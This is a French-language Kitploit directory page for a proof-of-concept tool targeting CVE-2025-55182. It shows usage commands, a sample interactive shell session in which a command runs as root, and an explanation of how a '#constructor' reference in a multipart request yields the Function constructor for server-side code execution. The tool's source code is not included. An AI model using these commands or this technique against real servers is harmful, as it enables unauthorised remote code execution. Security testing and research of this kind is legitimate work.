Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-PoC — Poc for CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

Poc for CVE-2025-55182

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182-PoC

PoC pour CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Avis de non-responsabilité légal

Cet outil est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Le développeur décline toute responsabilité et n'est pas responsable de toute mauvaise utilisation ou des dommages causés par ce programme.

Prérequis

pip install requests

Utilisation

Vous pouvez exécuter l'outil en trois modes : Check, Exploit ou Interactive Shell.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Exemple

root@kitploit:~
python3 poc.py -u http://target-site.com --check

Exécution d'une commande unique

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Mode Shell interactif

root@kitploit:~
python3 poc.py

# À l'intérieur du shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

Comment ça fonctionne

La vérification (Check) : Envoie une requête multipart définissant {} à l'index 1, et tente d'accéder à ["$1:a:a"]. Les serveurs non patchés plantent (HTTP 500) en essayant d'accéder à la propriété a de undefined. Les serveurs patchés renvoient HTTP 200.

L'exploitation (Exploit) : Envoie une requête multipart faisant référence à l'ID d'action valide, mais ajoute #constructor. Cela trompe le sérialiseur en lui faisant retourner le constructeur Function, permettant d'exécuter du JavaScript arbitraire (Node.js child_process) sur le serveur.

Télécharger l’outil